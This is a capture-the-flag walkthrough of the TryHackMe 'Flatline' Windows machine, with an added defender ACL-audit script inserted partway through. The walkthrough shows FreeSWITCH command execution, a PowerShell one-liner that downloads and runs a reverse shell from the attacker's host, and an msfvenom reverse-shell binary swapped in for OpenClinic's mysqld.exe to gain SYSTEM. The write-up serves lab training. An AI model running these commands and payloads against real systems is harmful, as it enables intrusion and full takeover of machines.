TryHackMe page for this machine => https://tryhackme.com/room/flatline
NOTE: I had to terminate and start the machine multiple times, as the exploit needed for the foothold timed out multiple times. You may have to do the same.
Enum
rustscan nmap
rustscan -a 10.10.98.113 -- -A -Pn
Open 10.10.98.113:3389
Open 10.10.98.113:8021
PORT STATE SERVICE REASON VERSION
3389/tcp open ms-wbt-server syn-ack Microsoft Terminal Services
| rdp-ntlm-info:
| Target_Name: WIN-EOM4PK0578N
| NetBIOS_Domain_Name: WIN-EOM4PK0578N
| NetBIOS_Computer_Name: WIN-EOM4PK0578N
| DNS_Domain_Name: WIN-EOM4PK0578N
| DNS_Computer_Name: WIN-EOM4PK0578N
| Product_Version: 10.0.17763
|_ System_Time: 2022-11-06T09:40:13+00:00
| ssl-cert: Subject: commonName=WIN-EOM4PK0578N
| Issuer: commonName=WIN-EOM4PK0578N
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2022-11-05T09:12:21
| Not valid after: 2023-05-07T09:12:21
| MD5: 3090 28ea a18f 37ce f134 275b 8a11 85b7
| SHA-1: 0594 e942 a7b3 ca04 7e4e 625c 6c0b 6903 f089 dde0
|_ssl-date: 2022-11-06T09:40:13+00:00; 0s from scanner time.
8021/tcp open freeswitch-event syn-ack FreeSWITCH mod_event_socket
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 0s, deviation: 0s, median: 0s
Note: the machine drops ICMP ping probes, so use the nmap -Pn flag when enumerating it!
Port 3389 Enumeration
Let's use some nmap scripts to enumerate the port some more.
└─$ sudo nmap --script="rdp-*" -p 3389 flatline.thm -vv -Pn
PORT STATE SERVICE REASON
3389/tcp open ms-wbt-server syn-ack ttl 127
| rdp-ntlm-info:
| Target_Name: WIN-EOM4PK0578N
| NetBIOS_Domain_Name: WIN-EOM4PK0578N
| NetBIOS_Computer_Name: WIN-EOM4PK0578N
| DNS_Domain_Name: WIN-EOM4PK0578N
| DNS_Computer_Name: WIN-EOM4PK0578N
| Product_Version: 10.0.17763
|_ System_Time: 2022-11-06T09:55:55+00:00
| rdp-enum-encryption:
| Security layer
| CredSSP (NLA): SUCCESS
| CredSSP with Early User Auth: SUCCESS
|_ RDSTLS: SUCCESS
Port 8021 Enumeration
I wanted to see what in the world FreeSWITCH is. From Wikipedia https://en.wikipedia.org/wiki/FreeSWITCH
*FreeSWITCH is free and open-source server software for real-time communication applications, including WebRTC, video, and voice over Internet Protocol (VoIP). It runs on Linux, Windows, macOS, and FreeBSD. FreeSWITCH is used to build private branch exchange (PBX) telecommunication systems, IVR services, videoconferencing with chat and screen sharing, wholesale least-cost routing, Session Border Controller (SBC) and embedded communication appliances.*
Let's look for some vulnerabilities.
└─$ searchsploit freeswitch
--------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
--------------------------------------------------------------------------------------------------------------------------- ---------------------------------
FreeSWITCH - Event Socket Command Execution (Metasploit) | multiple/remote/47698.rb
FreeSWITCH 1.10.1 - Command Execution | windows/remote/47799.txt
--------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
Interesting. Let's try and get RCE without Metasploit.
Foothold
RCE without Metasploit
Using the script present here => https://www.exploit-db.com/exploits/47799
└─$ python3 exploit.py flatline.thm whoami
Authenticated
Content-Type: api/response
Content-Length: 25
win-eom4pk0578n\nekrotic
Looks like it works! Let's try and get a proper shell going on here.
└─$ python3 exploit.py 10.10.7.242 dir
Authenticated
Content-Type: api/response
Content-Length: 2346
Volume in drive C has no label.
Volume Serial Number is 84FD-2CC9
Directory of C:\Program Files\FreeSWITCH
09/11/2021 07:38 <DIR> .
09/11/2021 07:38 <DIR> ..
09/11/2021 07:22 <DIR> cert
09/11/2021 07:22 <DIR> conf
06/11/2022 10:33 <DIR> db
09/11/2021 07:18 <DIR> fonts
20/08/2019 12:08 4,991,488 FreeSwitch.dll
20/08/2019 12:08 26,624 FreeSwitchConsole.exe
20/08/2019 12:19 62,976 fs_cli.exe
09/11/2021 07:18 <DIR> grammar
---
SNIP
---
24/03/2018 20:20 15,766,528 v8.dll
24/03/2018 20:05 177,152 v8_libbase.dll
24/03/2018 20:19 134,656 v8_libplatform.dll
03/04/2018 14:01 126,976 zlib.dll
28 File(s) 96,800,060 bytes
17 Dir(s) 50,476,666,880 bytes free
Let's try and get the user flag.
└─$ python3 exploit.py 10.10.7.242 "dir C:\\Users\\"
Authenticated
Content-Type: api/response
Content-Length: 405
Volume in drive C has no label.
Volume Serial Number is 84FD-2CC9
Directory of C:\Users
09/11/2021 07:28 <DIR> .
09/11/2021 07:28 <DIR> ..
09/11/2021 07:13 <DIR> Administrator
09/11/2021 07:37 <DIR> Nekrotic
09/11/2021 07:13 <DIR> Public
0 File(s) 0 bytes
5 Dir(s) 50,457,559,040 bytes free
└─$ python3 exploit.py 10.10.7.242 "dir C:\\Users\\Nekrotic\\Desktop\\"
Authenticated
Content-Type: api/response
Content-Length: 374
Volume in drive C has no label.
Volume Serial Number is 84FD-2CC9
Directory of C:\Users\Nekrotic\Desktop
09/11/2021 07:39 <DIR> .
09/11/2021 07:39 <DIR> ..
09/11/2021 07:39 38 root.txt
09/11/2021 07:39 38 user.txt
2 File(s) 76 bytes
2 Dir(s) 50,446,991,360 bytes free
Wow. We seem to have found both files. We can read user.txt, but we can't read root.txt. Probably a permissions issue.
Let's get a PowerShell reverse shell to see what's really going on.
PowerShell Reverse Shell
- Save this file https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellTcpOneLine.ps1
- Delete the second (commented-out) one-liner. Uncomment the first one and replace the IP and PORT with your own.
- Start a Python web server in the folder where you saved the powershell script. This is what we will use to serve the script.
- Download and execute the script on remote machine using the FreeSWITCH exploit.
Running the exploit
┌──(kali㉿kali)-[~/Documents/ctf/thm_easy_flatline]
└─$ python3 exploit.py 10.10.7.242 "powershell IEX (New-Object Net.WebClient).DownloadString('http://10.14.31.78/Invoke-PowerShellTcpOneLine.ps1')"
Run the web server to serve the PowerShell reverse shell
└─$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.7.242 - - [06/Nov/2022 06:20:12] "GET /Invoke-PowerShellTcpOneLine.ps1 HTTP/1.1" 200 -
Reverse Shell listener
┌──(kali㉿kali)-[~]
└─$ ncat -lnvp 4444
Ncat: Version 7.93 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 10.10.7.242.
Ncat: Connection from 10.10.7.242:49899.
PS C:\Program Files\FreeSWITCH> gci
Directory: C:\Program Files\FreeSWITCH
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 09/11/2021 07:22 cert
d----- 09/11/2021 07:22 conf
d----- 06/11/2022 10:33 db
d----- 09/11/2021 07:18 fonts
d----- 09/11/2021 07:18 grammar
....
SNIP
....
PS C:\Users\Nekrotic\Desktop> get-acl -path user.txt
Directory: C:\Users\Nekrotic\Desktop
Path Owner Access
---- ----- ------
user.txt WIN-EOM4PK0578N\Nekrotic NT AUTHORITY\SYSTEM Allow FullControl...
PS C:\Users\Nekrotic\Desktop> get-acl -Path root.txt
Directory: C:\Users\Nekrotic\Desktop
Path Owner Access
---- ----- ------
root.txt NT AUTHORITY\SYSTEM NT AUTHORITY\SYSTEM Allow FullControl
Now we can see why we can't read root.txt. We will need to escalate privileges to be able to read the file.
Privesc
While taking a look around the system, I came across this on the Administrator's desktop
PS C:\Users\Administrator\Desktop> gci
Directory: C:\Users\Administrator\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 08/11/2021 18:24 108048384 FreeSWITCH-1.10.1-Release-x64.msi
-a---- 08/11/2021 06:05 413584335 OpenClinicSetup5.194.18_32bit_full_fr_en_pt_es_nl.exe
I am guessing this OpenClinic software is installed. Looking around the system further, we find its installation location at C:\projects\openclinic.
PS C:\projects\openclinic> gci
Directory: C:\projects\openclinic
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 09/11/2021 07:29 jdk1.8
d----- 09/11/2021 07:19 mariadb
d----- 09/11/2021 07:30 tomcat8
d----- 09/11/2021 07:29 Uninstall
-a---- 06/04/2021 23:14 250 configureCountry.bat
-a---- 01/07/2021 18:20 167 configureLanguage.bat
-a---- 09/11/2021 07:18 334840 lua5.1.dll
-a---- 07/06/2021 16:58 93696 OpenClinic GA login.exe
-a---- 08/05/2020 12:17 27136 OpenClinicStartServices.exe
-a---- 02/05/2021 00:45 316 stopOpenClinicHttp.bat
-a---- 09/11/2021 07:18 1389568 uninstall.exe
Let's see what we can do with this.
┌──(kali㉿kali)-[~/Documents/ctf_tools]
└─$ searchsploit openclinic
--------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
--------------------------------------------------------------------------------------------------------------------------- ---------------------------------
OpenClinic GA 5.194.18 - Local Privilege Escalation | windows/local/50448.txt
--------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Details of this exploit here => https://www.exploit-db.com/exploits/50448
According to the instructions, we need to replace the mysqld.exe present in the OpenClinic installation with a payload we generate ourselves, so that the service runs it as SYSTEM on the next start.
Let's see if we have the permissions to do that.
PS C:\projects\openclinic\mariadb\bin> get-acl -Path .
Directory: C:\projects\openclinic\mariadb
Path Owner Access
---- ----- ------
bin BUILTIN\Administrators NT AUTHORITY\SYSTEM Allow FullControl...
PS C:\projects\openclinic\mariadb\bin> whoami /groups
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
============================================================= ================ ============ ===============================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Local account and member of Administrators group Well-known group S-1-5-114 Mandatory group, Enabled by default, Enabled group
BUILTIN\Administrators Alias S-1-5-32-544 Mandatory group, Enabled by default, Enabled group, Group owner
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\BATCH Well-known group S-1-5-3 Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON Well-known group S-1-2-1 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Local account Well-known group S-1-5-113 Mandatory group, Enabled by default, Enabled group
LOCAL Well-known group S-1-2-0 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level Label S-1-16-12288
Looks like we can.
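As an added, defender-side check that is not part of the original writeup: a PowerShell audit that lists ACEs granting write rights to low-privilege principals on a service binary directory and the executables in it. Administrators can always replace a service binary; the misconfiguration worth hunting for is standard users being able to, which is what turns the mysqld.exe swap from the exploit above into a real privilege escalation. The path C:\projects\openclinic\mariadb\bin is taken from the writeup; everything else is assumed.

```powershell
# Added example (not from the original writeup): audit a service binary
# directory for ACEs that let non-administrative principals write to it.
# Default path assumed from the writeup's OpenClinic installation.
param(
    [string]$Path = 'C:\projects\openclinic\mariadb\bin'
)

# Principals that every interactive or local user effectively belongs to.
$lowPriv = @('Everyone', 'BUILTIN\Users',
             'NT AUTHORITY\Authenticated Users', 'NT AUTHORITY\INTERACTIVE')

# Rights that allow replacing or altering an executable.
$writeRights = [System.Security.AccessControl.FileSystemRights]::Write -bor
               [System.Security.AccessControl.FileSystemRights]::Modify -bor
               [System.Security.AccessControl.FileSystemRights]::FullControl -bor
               [System.Security.AccessControl.FileSystemRights]::Delete

function Test-WeakBinaryAcl {
    param([string]$Target)
    $findings = @()
    # Check the directory itself plus every .exe/.dll below it.
    $items = @(Get-Item -LiteralPath $Target) +
             @(Get-ChildItem -LiteralPath $Target -Include *.exe,*.dll -Recurse)
    foreach ($item in $items) {
        $acl = Get-Acl -LiteralPath $item.FullName
        foreach ($ace in $acl.Access) {
            if ($ace.AccessControlType -ne 'Allow') { continue }
            if ($lowPriv -notcontains $ace.IdentityReference.Value) { continue }
            # Note: generic rights on inherited ACEs (e.g. 0x10000000 GENERIC_ALL)
            # are not decoded here and would need a separate mapping.
            if (($ace.FileSystemRights -band $writeRights) -ne 0) {
                $findings += [pscustomobject]@{
                    Path      = $item.FullName
                    Principal = $ace.IdentityReference.Value
                    Rights    = $ace.FileSystemRights
                    Inherited = $ace.IsInherited
                }
            }
        }
    }
    return $findings
}

$weak = @(Test-WeakBinaryAcl -Target $Path)
if ($weak.Count -eq 0) {
    Write-Output "No write access for low-privilege principals under $Path"
} else {
    # Each row is a binary a standard user could replace before a service restart.
    $weak | Format-Table -AutoSize
}
```

The fix for any row it reports is to restrict the ACE to Administrators and SYSTEM (or reinstall the service under Program Files, which inherits sane ACLs), and a service restart after such a change should be treated as a detection trigger.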
Let's begin.
Generate Payload
On our machine.
└─$ msfpc powershell 10.14.31.78 443 cmd reverse stageless exe
[*] MSFvenom Payload Creator (MSFPC v1.4.5)
[i] IP: 10.14.31.78
[i] PORT: 443
[i] TYPE: windows (windows/shell_reverse_tcp)
[i] CMD: msfvenom -p windows/shell_reverse_tcp -f exe \
--platform windows -a x86 -e generic/none LHOST=10.14.31.78 LPORT=443 \
> '/home/kali/Documents/ctf/thm_easy_flatline/windows-shell-stageless-reverse-tcp-443.exe'
[i] windows shell created: '/home/kali/Documents/ctf/thm_easy_flatline/windows-shell-stageless-reverse-tcp-443.exe'
[i] MSF handler file: '/home/kali/Documents/ctf/thm_easy_flatline/windows-shell-stageless-reverse-tcp-443-exe.rc'
[i] Run: msfconsole -q -r '/home/kali/Documents/ctf/thm_easy_flatline/windows-shell-stageless-reverse-tcp-443-exe.rc'
[?] Quick web server (for file transfer)?: python2 -m SimpleHTTPServer 8080
[*] Done!
└─$ mv windows-shell-stageless-reverse-tcp-443.exe mysqld.exe
On the server.
We will have to restart the computer as per the exploit instructions.
PS C:\projects\openclinic\mariadb\bin> mv mysqld.exe mysqld.exe.bak
PS C:\projects\openclinic\mariadb\bin> IWR -Uri http://10.14.31.78/mysqld.exe -OutFile mysqld.exe
PS C:\projects\openclinic> Restart-Computer
Now we wait for our reverse shell to activate.
└─$ ncat -lnvp 443
Ncat: Version 7.93 ( https://nmap.org/ncat )
Ncat: Listening on :::443
Ncat: Listening on 0.0.0.0:443
Ncat: Connection from 10.10.52.62.
Ncat: Connection from 10.10.52.62:49669.
Microsoft Windows [Version 10.0.17763.737]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
nt authority\system
DONE! Go get that root flag!